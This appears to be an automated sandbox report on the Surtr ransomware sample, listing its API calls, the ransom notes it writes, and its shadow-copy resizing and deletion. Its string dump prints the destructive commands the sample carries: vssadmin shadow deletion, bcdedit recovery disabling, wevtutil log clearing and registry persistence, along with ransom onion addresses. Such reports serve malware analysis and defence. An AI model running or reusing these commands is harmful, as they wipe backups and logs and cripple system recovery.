Source: C:\Users\user\Desktop\surtr.exe | Code function: 0_2_00007FF7F5E61070 _fread_nolock,_fread_nolock,CryptAcquireContextW,CryptImportKey,CryptDecrypt,GetLastError, | 0_2_00007FF7F5E61070 |
Source: C:\Users\user\Desktop\surtr.exe | Code function: 3_2_0000000140005190 CryptEncrypt,GetLastError, | 3_2_0000000140005190 |
Source: C:\Users\user\Desktop\surtr.exe | Code function: 3_2_0000000140004BC0 CryptAcquireContextW,CryptGenKey,CryptExportKey,CryptExportKey,CryptBinaryToStringA,CryptBinaryToStringA,CryptStringToBinaryA,CryptStringToBinaryA,CryptAcquireContextW,CryptImportKey,GetLastError,CryptExportKey,CryptExportKey,CryptBinaryToStringA,CryptBinaryToStringA,CryptDestroyKey,CryptAcquireContextW,CryptImportKey,GetLastError,GetLastError,GetLastError, | 3_2_0000000140004BC0 |
Source: C:\Users\user\Desktop\surtr.exe | Code function: 3_2_00000001400E87E0 GetFileAttributesW,GetFileAttributesW,CopyFileA,_fread_nolock,GetConsoleWindow,ShowWindow,OpenMutexW,CreateMutexW,GetCurrentProcess,SetPriorityClass,SetProcessPriorityBoost,GetModuleHandleA,GetProcAddress,GetCurrentProcess,ReadProcessMemory,GlobalMemoryStatusEx,CreateFileW,DeviceIoControl,GetCurrentThread,GetThreadContext,IsDebuggerPresent,GetModuleHandleW,GetModuleFileNameW,DeleteFileW,CopyFileW,DeleteFileW,CopyFileW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,_fread_nolock,GetFileAttributesW,_fread_nolock,CryptStringToBinaryA,CryptStringToBinaryA,CryptAcquireContextW,CryptImportKey,GetLastError,GetLastError,GetFileAttributesW,GetFileAttributesW,CopyFileW,CopyFileW,CopyFileW,CopyFileW,CopyFileW,CopyFileW,CopyFileW,CopyFileW,GetSystemInfo,CopyFileW,ReleaseMutex,MessageBoxW,MessageBoxW,MessageBoxW,MessageBoxW,Concurrency::cancel_current_task,Concurrency::cancel_current_task,Concurrency::cancel_current_task,MessageBoxW, | 3_2_00000001400E87E0 |
Source: C:\Users\user\Desktop\surtr.exe | Code function: 3_2_000000014010C008 CryptImportKey, | 3_2_000000014010C008 |
Source: C:\Users\user\Desktop\surtr.exe | Code function: 3_2_000000014010C030 CryptGenKey, | 3_2_000000014010C030 |
Source: C:\Users\user\Desktop\surtr.exe | Code function: 3_2_000000014010C058 CryptStringToBinaryA, | 3_2_000000014010C058 |
Source: C:\Users\user\Desktop\surtr.exe | Code function: 3_2_00000001400E91CB GetCurrentProcess,SetPriorityClass,SetProcessPriorityBoost,GetModuleHandleA,GetProcAddress,GetCurrentProcess,ReadProcessMemory,GlobalMemoryStatusEx,CreateFileW,DeviceIoControl,GetCurrentThread,GetThreadContext,IsDebuggerPresent,GetModuleHandleW,GetModuleFileNameW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,_fread_nolock,GetFileAttributesW,_fread_nolock,CryptStringToBinaryA,CryptStringToBinaryA,CryptAcquireContextW,CryptImportKey,GetLastError,GetFileAttributesW,GetFileAttributesW,CopyFileW,CopyFileW,CopyFileW,CopyFileW,CopyFileW,CopyFileW,CopyFileW,CopyFileW,GetSystemInfo,CopyFileW,ReleaseMutex,MessageBoxW,MessageBoxW,MessageBoxW,Concurrency::cancel_current_task,Concurrency::cancel_current_task,Concurrency::cancel_current_task,MessageBoxW, | 3_2_00000001400E91CB |
Source: C:\Users\user\Desktop\surtr.exe | File created: Z:\SURTR_README.hta | Jump to behavior |
Source: C:\Users\user\Desktop\surtr.exe | File created: Z:\SURTR_README.hta | Jump to behavior |
Source: C:\Users\user\Desktop\surtr.exe | File created: Z:\SURTR_README.hta | Jump to behavior |
Source: C:\Users\user\Desktop\surtr.exe | File created: Z:\SURTR_README.txt | Jump to behavior |
Source: C:\Users\user\Desktop\surtr.exe | File created: Z:\SURTR_README.txt | Jump to behavior |
Source: C:\Users\user\Desktop\surtr.exe | File created: Z:\SURTR_README.txt | Jump to behavior |
Source: C:\Users\user\Desktop\surtr.exe | File created: Z:\Private_DATA.surt | Jump to behavior |
Source: C:\Users\user\Desktop\surtr.exe | File created: Z:\Private_DATA.surt | Jump to behavior |
Source: C:\Users\user\Desktop\surtr.exe | File created: Z:\Private_DATA.surt | Jump to behavior |
Source: C:\Windows\System32\vssadmin.exe | File opened: z: | |
Source: C:\Windows\System32\vssadmin.exe | File opened: x: | |
Source: C:\Windows\System32\vssadmin.exe | File opened: v: | |
Source: C:\Windows\System32\vssadmin.exe | File opened: t: | |
Source: C:\Windows\System32\vssadmin.exe | File opened: r: | |
Source: C:\Windows\System32\vssadmin.exe | File opened: p: | |
Source: C:\Windows\System32\vssadmin.exe | File opened: n: | |
Source: C:\Windows\System32\vssadmin.exe | File opened: l: | Jump to behavior |
Source: C:\Windows\System32\vssadmin.exe | File opened: j: | Jump to behavior |
Source: C:\Windows\System32\vssadmin.exe | File opened: h: | |
Source: C:\Windows\System32\vssadmin.exe | File opened: f: | |
Source: C:\Windows\System32\vssadmin.exe | File opened: d: | Jump to behavior |
Source: C:\Windows\System32\vssadmin.exe | File opened: b: | |
Source: C:\Windows\System32\vssadmin.exe | File opened: y: | |
Source: C:\Windows\System32\vssadmin.exe | File opened: w: | |
Source: C:\Windows\System32\vssadmin.exe | File opened: u: | |
Source: C:\Windows\System32\vssadmin.exe | File opened: s: | |
Source: C:\Users\user\Desktop\surtr.exe | File opened: q: | Jump to behavior |
Source: C:\Windows\System32\vssadmin.exe | File opened: o: | |
Source: C:\Windows\System32\vssadmin.exe | File opened: m: | |
Source: C:\Windows\System32\vssadmin.exe | File opened: k: | |
Source: C:\Windows\System32\vssadmin.exe | File opened: i: | Jump to behavior |
Source: C:\Windows\System32\vssadmin.exe | File opened: g: | Jump to behavior |
Source: C:\Windows\System32\vssadmin.exe | File opened: e: | |
Source: C:\Windows\System32\vssadmin.exe | File opened: c: | |
Source: C:\Windows\System32\vssadmin.exe | File opened: a: | |
Source: surtr.exe | String found in binary or memory: http://4rbgxisigb4pxnloxzc265rmzaj7fslrhyouegtrph2a7xhh55r6xaid.onion |
Source: surtr.exe | String found in binary or memory: http://surtr-decrypt.top/ |
Source: surtr.exe | String found in binary or memory: http://www.surtr-decrypt.top |
Source: surtr.exe | String found in binary or memory: https://TorProject.org |
Source: surtr.exe | String found in binary or memory: https://bridges.torproject.org |
Source: surtr.exe | String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize |
Source: surtr.exe | String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/8.0.1/normalize.css |
Source: surtr.exe | String found in binary or memory: https://fonts.googleapis.com/css2?family=Didact |
Source: surtr.exe | String found in binary or memory: https://tb-manual.torproject.org/about |
Source: surtr.exe | String found in binary or memory: https://www.TorProject.org |
Source: surtr.exe | String found in binary or memory: https://www.countryflags.io/ae/flat/32.png); |
Source: surtr.exe | String found in binary or memory: https://www.countryflags.io/de/flat/32.png); |
Source: surtr.exe | String found in binary or memory: https://www.countryflags.io/fr/flat/32.png); |
Source: surtr.exe | String found in binary or memory: https://www.countryflags.io/us/flat/32 |
Source: surtr.exe | String found in binary or memory: https://www.countryflags.io/us/flat/32.png); |
Source: C:\Windows\System32\chcp.com | Process created: C:\Windows\System32\vssadmin.exe vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=401MB | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=401MB | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=401MB | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin Delete Shadows /all /quiet | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=401MB | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin resize shadowstorage /for=D:\ /on=D:\ /maxsize=401MB | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=401MB | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=401MB | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=401MB | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=401MB | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=401MB | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=401MB | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=401MB | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=401MB | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=401MB | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=401MB | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=401MB | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=401MB | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=401MB | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=401MB | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=401MB | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=401MB | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=401MB | |
Source: C:\Users\user\Desktop\surtr.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB | Jump to behavior |
Source: C:\Users\user\Desktop\surtr.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=401MB | Jump to behavior |
Source: C:\Users\user\Desktop\surtr.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=401MB | Jump to behavior |
Source: C:\Users\user\Desktop\surtr.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=401MB | Jump to behavior |
Source: C:\Users\user\Desktop\surtr.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=401MB | Jump to behavior |
Source: C:\Users\user\Desktop\surtr.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=401MB | Jump to behavior |
Source: C:\Users\user\Desktop\surtr.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=401MB | Jump to behavior |
Source: C:\Users\user\Desktop\surtr.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=401MB | Jump to behavior |
Source: C:\Users\user\Desktop\surtr.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=401MB | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=401MB | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=401MB | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=401MB | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin Delete Shadows /all /quiet | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=401MB | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin resize shadowstorage /for=D:\ /on=D:\ /maxsize=401MB | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=401MB | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=401MB | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=401MB | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=401MB | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=401MB | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=401MB | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=401MB | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=401MB | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=401MB | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=401MB | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=401MB | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=401MB | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=401MB | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=401MB | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=401MB | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=401MB | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=401MB | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=401MB | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\vssadmin.exe vssadmin Delete Shadows /all /quiet | |
Source: surtr.exe | Binary or memory string: C:\Windows\System32\cmd.exe /c vssadmin Delete Shadows /all /quiet | |
Source: surtr.exe, 00000003.00000002.563302470.0000000140000000.00000040.00000001.sdmp | Binary or memory string: Host: ","api":","cryptstatus":"","filecount":"","version":"","starttime":"","email":"","privatekey":"","keyboards":"","hostname":"GB","username":"","hardused":"" ,"OS":"","crypter":"2i74xfkhsu4zd6qv5aiifv3wznj6vq3jo6mle3zxux6vpftyuezxhmad.onion.pet2i74xfkhsu4zd6qv5aiifv3wznj6vq3jo6mle3zxux6vpftyuezxhmad.onion.ly4.2.2.4donebanUser is Banned, do not try againmkdir C:\ProgramData\ServiceC:\ProgramData\Service\config.surtrconfig.surtrwb+C:\ProgramData\Service\SurtrBackGround.jpgC:\ProgramData\Service\SurtrBackGround.jpgattrib +h +s C:\ProgramData\Service\SurtrBackGround.jpgbootcfg /raw /a /safeboot:network /id 1bcdedit /set {current} safeboot networkreg ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce /v *test /t REG_SZ /d "bcdedit /deletevalue {current} safeboot" /f" /freg ADD HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce /v *execute /t REG_SZ /d "C:\ProgramData\Service\SurtrIcon.icoattrib +h C:\ProgramData\Service\SurtrIcon.icoreg DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.surt\ /va /freg ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.surt\UserChoice /v ProgId /t REG_SZ /d surt_auto_file /freg ADD HKEY_CLASSES_ROOT\.surt /ve /t REG_SZ /d surt_auto_file /freg ADD HKEY_CLASSES_ROOT\surt_auto_file\DefaultIcon /ve /t REG_SZ /d "C:\ProgramData\Service\SurtrIcon.ico" /fNoRunAnyWayC:\ProgramData\NoRunAnyWayWARNING. Self Protection Is Enable.offlinemodeWARNING. Bad Config.nowindowshideSurtrMUTEXecho offchcp 437IranRussiaUkraineArmeniaAzerbaijanTurkmenistanTurkeyGeorgiaKazakhstanTajikistanUzbekistanWARNING. Surtr does not run in this country, if you do it again you will be banned.WARNING. SandBox/Debugger Detected !!!runinsafemodeconfig.surtrC:\ProgramData\Service\config.surtr000000000000nostopservicesC:\ProgramData\Service\Service.surtnodeletebackupsC:\ProgramData\Service\BUs.surtC:\Windows\System32\cmd.exe /c vssadmin Delete Shadows /all /quietC:\Windows\System32\cmd.exe /c bcdedit /set {default} recoveryenabled NoC:\Windows\System32\cmd.exe /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailuresnocloseprocessesnoregeditC:\ProgramData\Service\reg.surtnostartupnocryptingfor /F "tokens=*" %s in ('wevtutil.exe el') DO wevtutil.exe cl "%s"schtasks /CREATE /SC ONLOGON /TN exp /TR C:\Windows\explorer.exe /Freg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr |